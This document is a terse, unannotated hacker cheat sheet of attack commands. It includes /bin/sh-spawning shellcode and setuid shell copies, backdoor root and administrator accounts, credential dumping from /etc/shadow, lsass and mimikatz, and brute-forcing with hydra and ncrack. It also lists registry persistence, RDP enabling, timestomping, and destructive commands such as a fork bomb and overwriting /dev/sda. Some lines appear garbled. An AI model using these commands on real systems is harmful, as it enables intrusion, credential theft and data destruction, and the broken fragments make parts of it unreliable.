telnet xxx.xxx.xxx.xxx 80		//http port
21|FTP		23|telnet		110|POP3	25|SMTP
HEAD / HTTP/1.0
curl -l http://

nc -l -n -v -p 1997			//netcat listen on port 1997
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Username

wget --save-headers target.com


.::[Steganography]::.
COPY /b File1.jpg+Pass.txt result.jpg
CAT File1.jpg Pass.txt > result.jpg

____________________________________
this['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
cat /etc/passwd
cat /etc/shadow
/etc/NetworkManager/system-connections/
alias pass="cat /etc/passwd"
touch -t MMDDhhmm ./shell.php
python BJoomla [-u USER|-U FILE] [-p PASS|-P FILE] [-h URL|-H FILE]

ln -s [source] [dest]

NET USER aixoa password /add
NET localgroup Administrators aixoa /add
NET share concfg*C\/grant:aixoa,full

find /var/log/nginx -mmin -2				//find change of var/log/nginx in last 2 min
grep -lir "content" *					//find all files contain "content"
netstat -tlpn							//list open port and PID
tcpdump
arp -a
arp -s IPmodem	MAC
arp -s IPpc		MAC
nbtstat -a name	-A IP
ipconfig /displaydns
ipconfig /flushdns
ifconfig								//Get interface

ncrack -p 22 -user username -P wordlist x.x.x.x
psexec \\computername -u username -p password C:\x.exe|ipconfig

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755					//rm - rf /
:(){ :|: & };:											//Terminal DoS
dd if=/dev/random of=/dev/sda
mv ~ /dev/null

psexec.exe -i -s %SystemRoot%\system32\cmd.exe			//Run as NT AUTHORITY\SYSTEM
at \\192.168.1.3 20:55 C:\X.bat
procdump.exe -accepteula -ma lsass.exe MyDump.dmp
sekurlsa::minidump lsass.dmp

./goofile.py -d test.com -f pdf							//Info gathering
./theHarvester.py -d domain|email|name -l limit -b all

setsebool -P httpd_can_network_connect 1

hydra -l admin -P password.lst -s 80  192.168.1.2 http-get /
________________
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows

HKLM\System\CurrentControlSet\Control\SafeBoot
HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKLM\System\CurrentControlSet\Services
.::[EnableRDP]::.
"hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
"hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowRemoteRPC" /t REG_DWORD /d 0x1 /f


.::[Mimikatz]::.
privilege::debug
sekurlsa::logonpasswords


.::[Wfuzz]::.
python wfuzz.py -c -z file,./wordlist/vulns/cgis.txt --hc 403,404,400,402 http://www.example.com/FUZZ
-H "User-Agent: Mozilla"
-z range,1-100
-d "id=1&catalogue=FUZZ"				//POST
-R 2
-X
-b cookie
--follow
-I						//HEAD
--basic/ntlm/digest user:pass|domainFUZ2Z:FUZZ
--hc/hl/hw/hh code/lines/words/chars
--hs regex
-p ip:port-ip:port-ip:port
-x SOCK4|SOCK5
-t
-s						//Delay

-z list,uno,uri_hexadecimal-md5
-z list,TRACE -z file,urls.txt -X http://FUZZ
wfuzz.py -e encoders | grep url
--hh=BBB http://mysite.com/FUZZ{directory not there}
-z list,a-b-c -z list,1-2-3 -m product|zip|chain http://mysite.com/FUZZ/FUZ2Z


.::[WebDAV]::.
./nmap --script=http-iis-webdav-vuln -p80,8080 --script-args=webdavfolder=\"/\" example.com

PUT ./x.html
<header>
<content>


.::[Host Discovery]::.
nmap -sP|-sn 192.168.1.0/24
nmap -sL 192.168.1.0/24
nmap -PR|--disable-arp-ping 192.168.1.0/24
-sn|-sP					//Ping scan
___________________________
sniffer-detect.nse
nbstat.nse				Display Netbios
banner.nse				Banner Grabber
dns-brute.nse
hostmap-bfk.nse				Virtual Hosts
http-enum.nse				HTTP Bruteforce | --script-args http-enum.basepath='pub/'
smb-os-discovery.nse
smb-brute.nse